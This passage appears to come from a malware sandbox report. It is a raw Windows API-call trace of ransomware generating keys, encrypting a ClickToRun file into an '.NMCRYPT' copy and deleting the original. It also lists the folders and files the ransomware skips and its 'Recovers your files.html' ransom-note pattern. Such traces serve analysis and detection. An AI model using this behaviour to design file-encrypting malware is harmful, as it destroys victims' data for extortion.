dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.460] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.461] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.462] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d3e40*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x28d3e40*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0143.462] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d3f40*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x28d3f40*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0143.463] CryptCreateHash (in: hProv=0x8e3a18, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x60d19c | out: phHash=0x60d19c) returned 1 [0143.463] CryptHashData (hHash=0x8be078, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.463] CryptDeriveKey (in: hProv=0x8e3a18, Algid=0x6610, hBaseData=0x8be078, dwFlags=0x4, phKey=0x60d1a0 | out: phKey=0x60d1a0*=0x8be0b8) returned 1 [0143.463] CryptSetKeyParam (hKey=0x8be0b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0143.463] CryptSetKeyParam (hKey=0x8be0b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0143.463] wcslen (_String="\\\\?\\") returned 0x4 [0143.463] CryptDuplicateKey (in: hKey=0x8be0b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x8bdbb8) returned 1 [0143.463] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0143.463] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5a0 [0143.464] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=102) returned 1 [0143.464] WriteFile (in: hFile=0x588, lpBuffer=0x28d3e40*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d3e40*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0143.464] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x66, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x66, lpOverlapped=0x0) returned 1 [0143.465] CryptEncrypt (in: hKey=0x8bdbb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x66, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x70) returned 1 [0143.465] GetLastError () returned 0x0 [0143.465] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x70, lpOverlapped=0x0) returned 1 [0143.466] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0143.466] WriteFile (in: hFile=0x588, lpBuffer=0x607978*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0143.466] CloseHandle (hObject=0x5a0) returned 1 [0143.466] CloseHandle (hObject=0x588) returned 1 [0143.466] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash")) returned 0x20 [0143.466] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash", dwFileAttributes=0x20) returned 1 [0143.467] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash") returned 1 [0143.467] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\i641033.hash" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\i641033.hash")) returned 1 [0143.467] CryptDestroyKey (hKey=0x8bdbb8) returned 1 [0143.467] wcslen (_String="OK") returned 0x2 [0143.467] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.467] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.468] CryptDestroyKey (hKey=0x8be0b8) returned 1 [0143.468] CryptDestroyHash (hHash=0x8be078) returned 1 [0143.468] CryptReleaseContext (hProv=0x8e3a18, dwFlags=0x0) returned 1 [0143.468] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.468] PathMatchSpecW (pszFile="IntegratedOffice.exe", pszSpec="*NMCRYPT") returned 0 [0143.468] PathMatchSpecW (pszFile="IntegratedOffice.exe", pszSpec="*Recovers your files.html") returned 0 [0143.468] PathMatchSpecW (pszFile="IntegratedOffice.exe", pszSpec="*.exe") returned 1 [0143.468] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.468] PathMatchSpecW (pszFile="MavInject32.exe", pszSpec="*NMCRYPT") returned 0 [0143.468] PathMatchSpecW (pszFile="MavInject32.exe", pszSpec="*Recovers your files.html") returned 0 [0143.468] PathMatchSpecW (pszFile="MavInject32.exe", pszSpec="*.exe") returned 1 [0143.468] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.468] PathMatchSpecW (pszFile="mso20win32client.dll", pszSpec="*NMCRYPT") returned 0 [0143.468] PathMatchSpecW (pszFile="mso20win32client.dll", pszSpec="*Recovers your files.html") returned 0 [0143.468] PathMatchSpecW (pszFile="mso20win32client.dll", pszSpec="*.exe") returned 0 [0143.468] PathMatchSpecW (pszFile="mso20win32client.dll", pszSpec="*.dll") returned 1 [0143.468] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.468] PathMatchSpecW (pszFile="mso30win32client.dll", pszSpec="*NMCRYPT") returned 0 [0143.468] PathMatchSpecW (pszFile="mso30win32client.dll", pszSpec="*Recovers your files.html") returned 0 [0143.468] PathMatchSpecW (pszFile="mso30win32client.dll", pszSpec="*.exe") returned 0 [0143.468] PathMatchSpecW (pszFile="mso30win32client.dll", pszSpec="*.dll") returned 1 [0143.468] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.468] PathMatchSpecW (pszFile="mso40uires.dll", pszSpec="*NMCRYPT") returned 0 [0143.468] PathMatchSpecW (pszFile="mso40uires.dll", pszSpec="*Recovers your files.html") returned 0 [0143.468] PathMatchSpecW (pszFile="mso40uires.dll", pszSpec="*.exe") returned 0 [0143.468] PathMatchSpecW (pszFile="mso40uires.dll", pszSpec="*.dll") returned 1 [0143.468] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.468] PathMatchSpecW (pszFile="mso40uiwin32client.dll", pszSpec="*NMCRYPT") returned 0 [0143.468] PathMatchSpecW (pszFile="mso40uiwin32client.dll", pszSpec="*Recovers your files.html") returned 0 [0143.468] PathMatchSpecW (pszFile="mso40uiwin32client.dll", pszSpec="*.exe") returned 0 [0143.468] PathMatchSpecW (pszFile="mso40uiwin32client.dll", pszSpec="*.dll") returned 1 [0143.468] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.468] PathMatchSpecW (pszFile="msointl30.en-us.dll", pszSpec="*NMCRYPT") returned 0 [0143.468] PathMatchSpecW (pszFile="msointl30.en-us.dll", pszSpec="*Recovers your files.html") returned 0 [0143.468] PathMatchSpecW (pszFile="msointl30.en-us.dll", pszSpec="*.exe") returned 0 [0143.468] PathMatchSpecW (pszFile="msointl30.en-us.dll", pszSpec="*.dll") returned 1 [0143.468] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.468] PathMatchSpecW (pszFile="msvcp120.dll", pszSpec="*NMCRYPT") returned 0 [0143.468] PathMatchSpecW (pszFile="msvcp120.dll", pszSpec="*Recovers your files.html") returned 0 [0143.468] PathMatchSpecW (pszFile="msvcp120.dll", pszSpec="*.exe") returned 0 [0143.468] PathMatchSpecW (pszFile="msvcp120.dll", pszSpec="*.dll") returned 1 [0143.468] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.468] PathMatchSpecW (pszFile="msvcp140.dll", pszSpec="*NMCRYPT") returned 0 [0143.468] PathMatchSpecW (pszFile="msvcp140.dll", pszSpec="*Recovers your files.html") returned 0 [0143.468] PathMatchSpecW (pszFile="msvcp140.dll", pszSpec="*.exe") returned 0 [0143.469] PathMatchSpecW (pszFile="msvcp140.dll", pszSpec="*.dll") returned 1 [0143.469] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.469] PathMatchSpecW (pszFile="msvcr120.dll", pszSpec="*NMCRYPT") returned 0 [0143.469] PathMatchSpecW (pszFile="msvcr120.dll", pszSpec="*Recovers your files.html") returned 0 [0143.469] PathMatchSpecW (pszFile="msvcr120.dll", pszSpec="*.exe") returned 0 [0143.469] PathMatchSpecW (pszFile="msvcr120.dll", pszSpec="*.dll") returned 1 [0143.469] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.469] PathMatchSpecW (pszFile="OfficeC2RClient.exe", pszSpec="*NMCRYPT") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeC2RClient.exe", pszSpec="*Recovers your files.html") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeC2RClient.exe", pszSpec="*.exe") returned 1 [0143.469] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.469] PathMatchSpecW (pszFile="OfficeC2RCom.dll", pszSpec="*NMCRYPT") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeC2RCom.dll", pszSpec="*Recovers your files.html") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeC2RCom.dll", pszSpec="*.exe") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeC2RCom.dll", pszSpec="*.dll") returned 1 [0143.469] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.469] PathMatchSpecW (pszFile="OfficeClickToRun.exe", pszSpec="*NMCRYPT") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeClickToRun.exe", pszSpec="*Recovers your files.html") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeClickToRun.exe", pszSpec="*.exe") returned 1 [0143.469] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*NMCRYPT") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*Recovers your files.html") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*.exe") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*.dll") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*.lnk") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*.bat") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*.ini") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*.msi") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*.scf") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*pagefile.sys*") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*NTUSER.DAT*") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*AppData*") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*\\winrar\\*") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*\\java\\*") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*\\windows\\*") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*\\ESET\\*") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*\\AVG\\*") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*\\AVIRA\\*") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*Atheros*") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*Realtek*") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*bootmgr*") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*boot*") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*boot*") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*CONFIG.SYS*") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*IO.SYS*") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*MSDOS.SYS*") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*NTDETECT.COM*") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*ntldr*") returned 0 [0143.469] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*chrome*") returned 0 [0143.470] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*opera*") returned 0 [0143.470] PathMatchSpecW (pszFile="OfficeUpdateSchedule.xml", pszSpec="*firefox*") returned 0 [0143.470] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml", pszSpec="*") returned 1 [0143.470] strlen (_Str="NMoreira") returned 0x8 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 